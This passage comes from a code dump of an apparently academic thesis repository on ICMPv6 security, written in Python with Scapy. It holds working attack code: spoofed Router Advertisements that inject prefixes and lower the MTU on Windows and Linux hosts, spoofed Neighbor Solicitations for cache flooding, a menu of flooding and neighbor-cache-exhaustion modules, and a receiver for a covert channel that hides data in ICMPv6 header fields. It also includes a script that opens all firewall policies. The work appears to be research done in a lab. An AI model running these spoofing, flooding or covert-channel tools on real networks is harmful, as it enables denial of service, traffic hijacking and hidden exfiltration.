self.extractBytes(length, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 24\n container = self.extractBytes(unused, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n # bitLength = 64\n # if payload != 'x':\n # payload = int(payload)\n # container = self.extractBytes(payload, bitLength)\n # for item in container:\n # sys.stdout.write(chr(item))\n # sys.stdout.flush\n elif ICMPv6ParamProblem in packet[0]:\n code = packet[ICMPv6ParamProblem].code\n pointer = packet[ICMPv6ParamProblem].ptr\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n if code == 0:\n bitLength = 32\n container = self.extractBytes(pointer, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6EchoRequest in packet[0]:\n code = packet[ICMPv6EchoRequest].code\n idn = packet[ICMPv6EchoRequest].id\n seq = packet[ICMPv6EchoRequest].seq\n data = packet[ICMPv6EchoRequest].data\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n bitLength = 16\n container = self.extractBytes(idn, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 16\n container = self.extractBytes(seq, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n if(data):\n #this because scapy internals transform it in string before sending\n data = int(data)\n bitLength = 64\n container = self.extractBytes(data, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6EchoReply in packet[0]:\n code = packet[ICMPv6EchoReply].code\n idn = packet[ICMPv6EchoReply].id\n seq = packet[ICMPv6EchoReply].seq\n data = packet[ICMPv6EchoReply].data\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n bitLength = 16\n container = self.extractBytes(idn, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 16\n container = self.extractBytes(seq, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n if(data):\n #this because scapy internals transform it in string before sending\n data = int(data)\n bitLength = 64\n container = self.extractBytes(data, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6ND_RS in packet[0]:\n code = packet[ICMPv6ND_RS].code\n res = packet[ICMPv6ND_RS].res\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n bitLength = 32\n container = self.extractBytes(res, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6ND_RA in packet[0]:\n code = packet[ICMPv6ND_RA].code\n chlim = packet[ICMPv6ND_RA].chlim\n M = packet[ICMPv6ND_RA].M\n O = packet[ICMPv6ND_RA].O\n H = packet[ICMPv6ND_RA].H\n prf = packet[ICMPv6ND_RA].prf\n P = packet[ICMPv6ND_RA].P\n res = packet[ICMPv6ND_RA].res\n routerlifetime = packet[ICMPv6ND_RA].routerlifetime\n reachabletime = packet[ICMPv6ND_RA].reachabletime\n retranstimer = packet[ICMPv6ND_RA].retranstimer\n if code not in range(1,7):\n bitLength = 8\n container = self.extractBytes(code, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 8\n container = self.extractBytes(chlim, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n if code == 1:\n self.containerBits += str(M)\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n elif code == 2:\n self.containerBits += str(O)\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n elif code == 3:\n self.containerBits += str(H)\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n elif code == 4:\n tmpBit = BitArray(uint=prf, length=2)\n self.containerBits += tmpBit.bin\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n elif code == 5:\n self.containerBits += str(P)\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n elif code == 6:\n tmpBit = BitArray(uint=res, length=2)\n self.containerBits += tmpBit.bin\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n bitLength = 16\n container = self.extractBytes(routerlifetime, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 32\n container = self.extractBytes(reachabletime, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 32\n container = self.extractBytes(retranstimer, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6ND_NS in packet[0]:\n code = packet[ICMPv6ND_NS].code\n res = packet[ICMPv6ND_NS].res\n tgt = packet[ICMPv6ND_NS].tgt\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n #it seems that scapy neighbor solicitation reserved field use only 24 bits(ver2.3.2)\n #requires version 2.3.2-dev\n bitLength = 32\n container = self.extractBytes(res, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 128\n container = self.extractBytesAddress(tgt, bitLength)\n if container:\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6ND_NA in packet[0]:\n code = packet[ICMPv6ND_NA].code\n res = packet[ICMPv6ND_NA].res\n R = packet[ICMPv6ND_NA].R\n S = packet[ICMPv6ND_NA].S\n O = packet[ICMPv6ND_NA].O\n tgt = packet[ICMPv6ND_NA].tgt\n if code not in range(1,4):\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n bitLength = 24\n container = self.extractBytes(res, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n if code == 1:\n self.containerBits += str(R)\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n if code == 2:\n self.containerBits += str(S)\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n if code == 3:\n self.containerBits += str(O)\n if len(self.containerBits) == 8:\n container = self.extractBytes(int(self.containerBits, 2), 8)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n self.containerBits = ''\n bitLength = 128\n container = self.extractBytesAddress(tgt, bitLength)\n if container:\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n elif ICMPv6ND_Redirect in packet[0]:\n code = packet[ICMPv6ND_Redirect].code\n res = packet[ICMPv6ND_Redirect].res\n tgt = packet[ICMPv6ND_Redirect].tgt\n dst = packet[ICMPv6ND_Redirect].dst\n sys.stdout.write(chr(code))\n sys.stdout.flush()\n bitLength = 32\n container = self.extractBytes(res, bitLength)\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 128\n container = self.extractBytesAddress(tgt, bitLength)\n if container:\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n bitLength = 128\n container = self.extractBytesAddress(dst, bitLength)\n if container:\n for item in container:\n sys.stdout.write(chr(item))\n sys.stdout.flush\n\n def receive(self):\n sniff(iface=self.iface, filter='ip6 and dst '+self.ipAdr, prn=self.packet_callback, store=0)\n\n \"\"\"\n transform int in the binary strings format of variable length, then for each byte transform back in int\n \"\"\"\n def extractBytes(self, data, bitsLength):\n binary = BitArray(uint=data, length=bitsLength)\n bytesNum = bitsLength/8\n container = []\n for x in range(0, bytesNum):\n f = x*8\n s = (x+1)*8\n value = binary[f:s]\n container.append(int(value.bin, 2))\n return container\n\n \"\"\"\n split and strip out columns, check if the chunk is 0 or 1, added to send a regular ipv6 address, transform in binary \n using the hex value and build the container with each int value\n \"\"\"\n def extractBytesAddress(self, data, bitsLength):\n dataList = data.split(\":\")\n dataString = ''\n container = []\n for d in dataList:\n if d and d != '0' and d != '1':\n #len is 1 because scapy takes away leading 0s in ipv6 address\n if len(d) == 1:\n d = '0'+d\n binary = BitArray(hex=d)\n for x in range(0, len(binary)/8):\n f = x*8\n s = (x+1)*8\n value = binary[f:s]\n container.append(int(value.bin, 2))\n return container\n" }, { "alpha_fraction": 0.5574007034301758, "alphanum_fraction": 0.5588447451591492, "avg_line_length": 28.46808433532715, "blob_id": "cb37995204a6c46886775444dc75f3a748fecdb3", "content_id": "69a7687adc5c47af9040fc4f0be2b88d8497cdce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1385, "license_type": "no_license", "max_line_length": 66, "num_lines": 47, "path": "/python/code/modules.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom testingFramework import *\n\n\"\"\"\nclass responsible for the testing framework\n\"\"\"\nclass TestingFramework:\n\n def __init__(self, iface):\n self.name = 'Testing'\n self.iface = iface\n \n #starts the interactive propmt\n def startSystem(self):\n Commands.setTestingFrameworkHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setMainHistory()\n elif re.match('covert', command):\n channel = CovertChannel(self.iface)\n channel.startSystem() \n elif re.match('attacking', command):\n channel = AttackingChannel(self.iface)\n channel.startSystem()\n else:\n print 'Error! Command not found!'\n\n def showHelp(self):\n for entry in Help.getTestingFrameworkHelp():\n print entry\n" }, { "alpha_fraction": 0.6369743943214417, "alphanum_fraction": 0.683130145072937, "avg_line_length": 48.0121955871582, "blob_id": "1eed33ac1354da26acc395a638d8f1060e348857", "content_id": "f4166f37e44e829a244d7c4a9675ed9623eed4d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8038, "license_type": "no_license", "max_line_length": 197, "num_lines": 164, "path": "/python/code/RAAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nThis class test change/addition of prefix and MTU value with Router Advertisement.\n\"\"\" \nclass RA:\n \n def __init__(self):\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.firewall = \"2001:abcd:acad:2::1\"\n self.firewallMac = \"08:00:27:b1:da:41\"\n self.linkFirewall = \"fe80::1\"\n print 'Router Advertisement'\n\n #test to verify the possibility of exploitment, to be done in internal network\n def buildPacketInternalPrefix(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:1::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with link-local of firewall internal interface\n def buildPacketPrefix1(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:2::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with invalid link-local\n def buildPacketPrefix2(self, ipAdr):\n return IPv6(dst=ipAdr,src=\"fe80::a00:27bc:fefb:81f7\")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:3::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with global unicast of firewall internal int\n def buildPacketPrefix3(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:4::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with global unicast of debian linux\n def buildPacketPrefix4(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.linux)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:5::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with global unicast of windows 7\n def buildPacketPrefix5(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.win)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:6::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with global unicast of firewall internal int L flag is 0\n def buildPacketPrefix6(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=0,A=1,R=1,prefix=\"2001:abcd:1234:7::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with global unicast of firewall internal int R flag is 0\n def buildPacketPrefix7(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=0,prefix=\"2001:abcd:1234:8::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n #test with global unicast of firewall internal int L and R flags are 0\n def buildPacketPrefix8(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=0,A=1,R=0,prefix=\"2001:abcd:1234:9::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n\n #test to verify the possibility of exploitment, to be done in internal network\n def buildPacketInternalMTU(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptMTU(mtu=1350)\n\n #test with global unicast of firewall internal interface\n def buildPacketRemoteMTU(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptMTU(mtu=1360)\n\n \n def execModuleInternalPrefixWin(self, exitIface):\n packetContainer = self.buildPacketInternalPrefix(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalPrefixLinux(self, exitIface):\n packetContainer = self.buildPacketInternalPrefix(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalMTUWin(self, exitIface):\n packetContainer = self.buildPacketInternalMTU(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalMTULinux(self, exitIface):\n packetContainer = self.buildPacketInternalMTU(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n\n #interfaces for the experiment \n def execModuleRemotePrefixWin(self, exitIface):\n print \"{}\".format(\"Test 1\")\n packetContainer = self.buildPacketPrefix1(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 2\")\n packetContainer = self.buildPacketPrefix2(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 3\")\n packetContainer = self.buildPacketPrefix3(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 4\")\n packetContainer = self.buildPacketPrefix4(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 5\")\n packetContainer = self.buildPacketPrefix5(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 6\")\n packetContainer = self.buildPacketPrefix6(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 7\")\n packetContainer = self.buildPacketPrefix7(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 8\")\n packetContainer = self.buildPacketPrefix8(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n \n\n def execModuleRemotePrefixLinux(self, exitIface):\n print \"{}\".format(\"Test 1\")\n packetContainer = self.buildPacketPrefix1(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 2\")\n packetContainer = self.buildPacketPrefix2(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 3\")\n packetContainer = self.buildPacketPrefix3(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 4\")\n packetContainer = self.buildPacketPrefix4(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 5\")\n packetContainer = self.buildPacketPrefix5(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 6\")\n packetContainer = self.buildPacketPrefix6(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 7\")\n packetContainer = self.buildPacketPrefix7(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 8\")\n packetContainer = self.buildPacketPrefix8(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n \n\n def execModuleRemoteMTUWin(self, exitIface):\n packetContainer = self.buildPacketRemoteMTU(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleRemoteMTULinux(self, exitIface):\n packetContainer = self.buildPacketRemoteMTU(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.6305761933326721, "alphanum_fraction": 0.6308509707450867, "avg_line_length": 51.73429870605469, "blob_id": "51f5ed74537f26ed285b51a19939d19b55153868", "content_id": "ed5de2f949096019d1a6100ddb7a50f540497e31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10917, "license_type": "no_license", "max_line_length": 88, "num_lines": 207, "path": "/python/code/infoAndErrorAttacks.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom echoReply import *\nfrom destinationUnreach import *\nfrom packetTooBig import *\nfrom timeExceeded import *\nfrom parameterProblem import *\nfrom echoRequest import *\n\n\"\"\"\nThis is general class to start Informational and Error ICMPv6 message type tests.\n\"\"\"\nclass InfoAndErrorAttacks:\n\n def __init__(self, iface):\n self.iface = iface\n self.name = 'InfoAndErrorAttacks'\n\n def startSystem(self):\n Commands.setInfoAndErrorAttacksHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setAttackingChannelHistory()\n elif re.match('execEchoReplyRemoteWin', command):\n er = EchoReply()\n er.execModuleEchoReplyWin(self.iface)\n elif re.match('execDestUnreachAllWin', command):\n du = DestinationUnreach() \n du.execAllWindows(self.iface)\n elif re.match('execDestUnreachAllLinux', command):\n du = DestinationUnreach()\n du.execAllLinux(self.iface)\n elif re.match('execDestUnreachBadCodeWin', command):\n du = DestinationUnreach() \n du.execDestUnreachBadCodeWin(self.iface)\n elif re.match('execDestUnreachBadCodeLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachBadCodeLinux(self.iface)\n elif re.match('execDestUnreachDifferentLengthLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachLengthLinux(self.iface)\n elif re.match('execDestUnreachDifferentLengthWin', command):\n du = DestinationUnreach()\n du.execDestUnreachLengthWin(self.iface)\n elif re.match('execDestUnreachNoRouteWin', command):\n du = DestinationUnreach()\n du.execDestUnreachNoRouteToDestWin(self.iface)\n elif re.match('execDestUnreachNoRouteLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachNoRouteToDestLinux(self.iface)\n elif re.match('execDestUnreachAdrUnreachWin', command):\n du = DestinationUnreach()\n du.execDestUnreachAdrUnreachWin(self.iface)\n elif re.match('execDestUnreachAdrUnreachLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachAdrUnreachLinux(self.iface)\n elif re.match('execDestUnreachPortUnreachWin', command):\n du = DestinationUnreach()\n du.execDestUnreachPortUnreachWin(self.iface)\n elif re.match('execDestUnreachPortUnreachLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachPortUnreachLinux(self.iface)\n elif re.match('execDestUnreachComAdminProhibWin', command):\n du = DestinationUnreach()\n du.execDestUnreachCommDstAdminProhibitedWin(self.iface)\n elif re.match('execDestUnreachComAdminProhibLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachCommDstAdminProhibitedLinux(self.iface)\n elif re.match('execDestUnreachBeyondScopeWin', command):\n du = DestinationUnreach()\n du.execDestUnreachBeyondScopeSrcAdrWin(self.iface)\n elif re.match('execDestUnreachBeyondScopeLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachBeyondScopeSrcAdrLinux(self.iface)\n elif re.match('execDestUnreachSrcFailedPolicyWin', command):\n du = DestinationUnreach()\n du.execDestUnreachSrcFailedPolicyWin(self.iface)\n elif re.match('execDestUnreachSrcFailedPolicyLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachSrcFailedPolicyLinux(self.iface)\n elif re.match('execDestUnreachRejectRouteWin', command):\n du = DestinationUnreach()\n du.execDestUnreachRejectRouteWin(self.iface)\n elif re.match('execDestUnreachRejectRouteLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachRejectRouteLinux(self.iface)\n elif re.match('execPacketTooBigMTUBigWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUBigWin(self.iface)\n elif re.match('execPacketTooBigMTUBigLinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUBigLinux(self.iface)\n elif re.match('execPacketTooBigMTUSmallWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUSmallWin(self.iface)\n elif re.match('execPacketTooBigMTUSmallLinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUSmallLinux(self.iface)\n elif re.match('execPacketTooBigMTUWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUWin(self.iface)\n elif re.match('execPacketTooBigMTULinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTULinux(self.iface)\n elif re.match('execPacketTooBigBadCodeWin', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTUWin(self.iface)\n elif re.match('execPacketTooBigBadCodeLinux', command):\n ptb = PacketTooBig()\n ptb.execModulePacketTooBigMTULinux(self.iface)\n elif re.match('execTimeExceededBadCodeWin', command):\n te = TimeExceeded()\n te.execModuleTimeExceededBadCodeWin(self.iface)\n elif re.match('execTimeExceededBadCodeLinux', command):\n te = TimeExceeded()\n te.execModuleTimeExceededBadCodeLinux(self.iface)\n elif re.match('execTimeExceededHopLimitWin', command):\n te = TimeExceeded()\n te.execModuleTimeExceededHopLimitWin(self.iface)\n elif re.match('execTimeExceededHopLimitLinux', command):\n te = TimeExceeded()\n te.execModuleTimeExceededHopLimitLinux(self.iface)\n elif re.match('execTimeExceededFragmentReassemblyWin', command):\n te = TimeExceeded()\n te.execModuleTimeExceededFragmentReassemblyWin(self.iface)\n elif re.match('execTimeExceededFragmentReassemblyLinux', command):\n te = TimeExceeded()\n te.execModuleTimeExceededFragmentReassemblyLinux(self.iface)\n elif re.match('execTimeExceededLengthWin', command):\n te = TimeExceeded()\n te.execModuleTimeExceededLengthWin(self.iface)\n elif re.match('execTimeExceededLengthLinux', command):\n te = TimeExceeded()\n te.execModuleTimeExceededLengthLinux(self.iface)\n elif re.match('execParameterProblemBadCodeWin', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemBadCodeWin(self.iface)\n elif re.match('execParameterProblemBadCodeLinux', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemBadCodeLinux(self.iface)\n elif re.match('execParameterProblemFloodPointerWin', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemFloodPointerWin(self.iface)\n elif re.match('execParameterProblemFloodPointerLinux', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemFloodPointerLinux(self.iface)\n elif re.match('execParameterProblemFloodHighPointerWin', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemFloodHighPointerWin(self.iface)\n elif re.match('execParameterProblemFloodHighPointerLinux', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemFloodHighPointerLinux(self.iface)\n elif re.match('execParameterProblemErrHeaderWin', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemErrHeaderWin(self.iface)\n elif re.match('execParameterProblemErrHeaderLinux', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemErrHeaderLinux(self.iface)\n elif re.match('execParameterProblemUnrecHeaderWin', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemUnrecHeaderWin(self.iface)\n elif re.match('execParameterProblemUnrecHeaderLinux', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemUnrecHeaderLinux(self.iface)\n elif re.match('execParameterProblemUnrecIPOptionWin', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemUnrecIPOptionrWin(self.iface)\n elif re.match('execParameterProblemUnrecIPOptionLinux', command):\n pp = ParameterProblem()\n pp.execModuleParameterProblemUnrecIPOptionLinux(self.iface)\n elif re.match('execEchoRequestNeighCacheExhaustionDstVictimWin', command):\n er = EchoRequest()\n er.execModuleEchoRequestNeighCacheExhaustionDstVictimWin(self.iface)\n elif re.match('execEchoRequestNeighCacheExhaustionDstVictimLinux', command):\n er = EchoRequest()\n er.execModuleEchoRequestNeighCacheExhaustionDstVictimLinux(self.iface)\n elif re.match('execEchoRequestNeighCacheExhaustionSrcVictimWin', command):\n er = EchoRequest()\n er.execModuleEchoRequestNeighCacheExhaustionSrcVictimWin(self.iface)\n elif re.match('execEchoRequestNeighCacheExhaustionSrcVictimLinux', command):\n er = EchoRequest()\n er.execModuleEchoRequestNeighCacheExhaustionSrcVictimLinux(self.iface)\n elif re.match('execEchoReplyRemoteWin', command):\n er = EchoReply()\n er.execModuleEchoReplyWin(self.iface)\n elif re.match('execEchoReplyRemoteLinux', command):\n er = EchoReply()\n er.execModuleEchoReplyWin(self.iface)\n \n def showHelp(self):\n for entry in Help.getInfoAndErrorAttacksHelp():\n print entry\n\n" }, { "alpha_fraction": 0.7400000095367432, "alphanum_fraction": 0.7733333110809326, "avg_line_length": 17.75, "blob_id": "53f2cb67c95c6af4021f962bd25800a7cafd3052", "content_id": "0f0e8414f5500f0425cfa8deff2db598ef7fa276", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 300, "license_type": "no_license", "max_line_length": 40, "num_lines": 16, "path": "/thesis/files/firewall_open_rules.sh", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#flush iptables\nip6tables -F\n\n#activate forwarding\nsysctl -w net/ipv6/conf/all/forwarding=1\n\n#default policy\nip6tables -P INPUT ACCEPT\nip6tables -P FORWARD ACCEPT\nip6tables -P OUTPUT ACCEPT\n\n#forwarding chain\nip6tables -A FORWARD -i eth0 -j ACCEPT\nip6tables -A FORWARD -i eth1 -j ACCEPT\n" }, { "alpha_fraction": 0.5662136673927307, "alphanum_fraction": 0.6408206820487976, "avg_line_length": 47.11538314819336, "blob_id": "b0c156116bab97bbb048e4eb16a9907fb390ac24", "content_id": "478c44e2fd80c5e950baeef7d8049688a785e510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3753, "license_type": "no_license", "max_line_length": 122, "num_lines": 78, "path": "/python/code/NSAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nthe class build NS messages\n\"\"\"\nclass NS:\n \n def __init__(self):\n #TODO: PROBLEM WITH STATIC FIREWALL ADR (ASA IS DIFFERENT)\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.linuxMac = \"08:00:27:84:bb:37\"\n self.linuxSolicitedMulti = \"ff02::1:ff84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.winMac = \"08:00:27:82:a6:ec\"\n self.winSolicitedMulti = \"ff02::1:ff47:fd83\"\n self.firewallMac = \"08:00:27:b1:da:41\"\n print 'Neighbor Solicitation'\n\n\n #TODO: VERIFY SRC 0::0\n def buildPacketInternalCacheFlooding(self, mac, srcGlobalUni, ipAdr):\n sourceLinkLayer = ICMPv6NDOptSrcLLAddr(lladdr=mac)\n return Ether(src=mac)/IPv6(dst=ipAdr,src=\"0::0\")/ICMPv6ND_NS(tgt=srcGlobalUni)/sourceLinkLayer\n\n def buildPacketInternalSelfSolicitation(self, srcMac, srcIpAdr, solicitedMulti):\n sourceLinkLayer = 